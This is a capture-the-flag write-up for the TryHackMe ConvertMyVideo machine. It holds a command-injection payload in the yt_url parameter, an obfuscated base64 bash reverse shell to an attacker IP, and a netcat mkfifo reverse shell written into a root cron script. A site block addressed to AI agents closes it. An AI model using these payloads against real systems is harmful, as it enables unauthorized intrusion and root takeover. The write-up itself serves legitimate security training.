# ConvertMyVideo

## Nmap

```
sudo nmap 10.10.50.86 -p- -sS -sV

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelP
```

Port 80 lands us on a Youtube video conversion page.

![](/files/-MXE9-_RsS5zykNwM_Gk)

Running feroxbuster against the target website produces only a few results. Of which only the /admin directory is interesting. The /admin directory uses a HTTP-basic-form and I was unable to crack using rockyou.txt with common user names such as 'admin'.

![](/files/-MXE9QG0aCY1aE3I2stD)

Running a generic query does not produces anything interesting.

![](/files/-MXE9ijHbPS56gLEN0gQ)

Running the search query through Burpsuite gives us the parameter 'yt\_url'.

![](/files/-MXEA8rl1LUxrb4DZg_i)

Referring against this link we can try various command injection techniques for valid parameters.

{% embed url="<https://book.hacktricks.xyz/pentesting-web/command-injection>" %}

As per the link trying the following gives us a command injection result:

```
yt_url=ls||id;
```

![](/files/-MXEB0KRrJi_3SCeSM7z)

Knowing we can inject commands we can attempt a reverse shell by running the command below in a terminal on our attacking machine then taking the output and using it in our command injection

```
echo "echo $(echo 'bash -i >& /dev/tcp/10.14.3.108/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'
```

![](/files/-MXEBT0PtdRp5GR0aOnN)

Then paste the output into Burpsuite:

![](/files/-MXEBdo0MxVsIJRfXTqI)

Once sent we should receive a reverse shell on the `netcat` listener.

![](/files/-MXEBrYsl3Wn_jKepXuF)

After looking about the machine and running enumeration scripts I was unable to identify any points of escalation. I then decided to run [pspy64](https://github.com/DominicBreuker/pspy/releases) to see if anything is being executed on a regular basis.

After transferring and running we get the following results:

![](/files/-MXENqc8FbKaBjNrHhcu)

Frequently the following is being run:

`/bin/sh -c cd /var/www/html/tmp && bash /var/www/html/tmp/clean.sh`

From here I echo'd out the contents of clean.sh and replaced the contents with a `netcat` reverse shell.

```
echo  > clean.sh
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.14.3.108 4444 >/tmp/f' > clean.sh
```

Then set up a listener on port 4444 waited a few seconds and received a shell as root.

![](/files/-MXEQS2X_aUR4KX_Sxv1)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://viperone.gitbook.io/pentest-everything/writeups/tryhackme/linux/convertmyvideo.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.